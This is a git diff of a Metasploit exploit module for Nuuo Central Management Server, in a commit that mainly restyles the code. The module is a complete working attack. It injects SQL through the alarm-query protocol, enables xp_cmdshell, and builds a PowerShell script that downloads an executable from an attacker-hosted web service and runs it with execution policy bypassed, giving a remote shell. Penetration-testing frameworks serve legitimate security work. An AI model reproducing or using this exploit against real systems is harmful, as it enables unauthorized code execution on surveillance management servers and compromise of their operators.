Jacob Robles
parent
f5afe98111
commit
73048edd97
|
|
@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Nuuo Central Management Authenticated SQL Server SQLi",
|
||||
'Name' => 'Nuuo Central Management Authenticated SQL Server SQLi',
|
||||
'Description' => %q{
|
||||
The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.
|
||||
This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is
|
||||
|
|
@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
[ 'Nuuo Central Management Server <= v2.10.0', {} ],
|
||||
],
|
||||
'Privileged' => false, # we run as NETWORK_SERVICE
|
||||
'DisclosureDate' => "Oct 11 2018",
|
||||
'DisclosureDate' => 'Oct 11 2018',
|
||||
'DefaultTarget' => 0))
|
||||
register_options(
|
||||
[
|
||||
|
|
@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def inject_sql(sql, final = false)
|
||||
sql = ["GETOPENALARM","DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"]
|
||||
sql = ['GETOPENALARM',"DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"]
|
||||
if final
|
||||
nucs_send_msg_async(sql)
|
||||
else
|
||||
|
|
@ -63,12 +63,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
# Handle incoming requests from the server
|
||||
def on_request_uri(cli, request)
|
||||
#print_status("on_request_uri called: #{request.inspect}")
|
||||
if (not @pl)
|
||||
unless @pl
|
||||
print_error("A request came in, but the payload wasn't ready yet!")
|
||||
return
|
||||
end
|
||||
print_good("Sending the payload to CMS...")
|
||||
print_good('Sending the payload to CMS...')
|
||||
@exe_sent = true
|
||||
send_response(cli, @pl)
|
||||
end
|
||||
|
|
@ -85,14 +84,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def exploit
|
||||
nucs_login
|
||||
|
||||
if @nucs_session == nil
|
||||
fail_with(Failure::Unknown, "Failed to login to Nuuo CMS")
|
||||
unless @nucs_session
|
||||
fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS')
|
||||
end
|
||||
|
||||
downfile = rand_text_alpha(8+rand(8))
|
||||
@pl = generate_payload_exe
|
||||
@exe_sent = false
|
||||
resource_uri = '/' + downfile
|
||||
resource_uri = "/#{rand_text_alpha(8..16)}"
|
||||
|
||||
#do not use SSL
|
||||
if datastore['SSL']
|
||||
|
|
@ -100,13 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
datastore['SSL'] = false
|
||||
end
|
||||
|
||||
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
|
||||
srv_host = Rex::Socket.source_address(rhost)
|
||||
else
|
||||
srv_host = datastore['SRVHOST']
|
||||
end
|
||||
|
||||
service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
|
||||
service_url = "http://#{srvhost_addr}:#{srvport}#{resource_uri}"
|
||||
print_status("Starting up our web service on #{service_url} ...")
|
||||
start_service({'Uri' => {
|
||||
'Proc' => Proc.new { |cli, req|
|
||||
|
|
@ -120,24 +112,29 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# we need to roll our own here instead of using the MSSQL mixins
|
||||
# (tried that and it doesn't work)
|
||||
print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
|
||||
filename = rand_text_alpha_lower(rand(8) + 2) + ".exe"
|
||||
download_pl = %{xp_cmdshell 'cd C:\\windows\\temp\\ && echo $storageDir=$pwd > wget.ps1 && echo $webclient = New-Object System.Net.WebClient >> wget.ps1 && echo $url = "#{service_url}" >> wget.ps1 && echo $file = "#{filename}" >> wget.ps1 && echo $webclient.DownloadFile($url,$file) >> wget.ps1 && powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1'}
|
||||
filename = "#{rand_text_alpha_lower(8..10)}.exe"
|
||||
download_pl = %{xp_cmdshell }
|
||||
download_pl << %{'cd C:\\windows\\temp\\ && }
|
||||
download_pl << %{echo $webclient = New-Object System.Net.WebClient >> wget.ps1 && }
|
||||
download_pl << %{echo $url = "#{service_url}" >> wget.ps1 && }
|
||||
download_pl << %{echo $file = "#{filename}" >> wget.ps1 && }
|
||||
download_pl << %{echo $webclient.DownloadFile($url,$file) >> wget.ps1 && }
|
||||
download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1'}
|
||||
|
||||
print_status("Injecting PowerShell payload")
|
||||
print_status('Injecting PowerShell payload')
|
||||
inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
|
||||
|
||||
counter = 0
|
||||
while (not @exe_sent || counter >= datastore['SLEEP'])
|
||||
sleep 1
|
||||
Rex.sleep(1)
|
||||
counter += 1
|
||||
end
|
||||
|
||||
if not @exe_sent
|
||||
fail_with(Failure::Unknown, "Could not get CMS to download the payload")
|
||||
unless @exe_sent
|
||||
fail_with(Failure::Unknown, 'Could not get CMS to download the payload')
|
||||
end
|
||||
|
||||
print_status("Executing shell...")
|
||||
print_status('Executing shell...')
|
||||
inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{filename}\""), true)
|
||||
handler
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue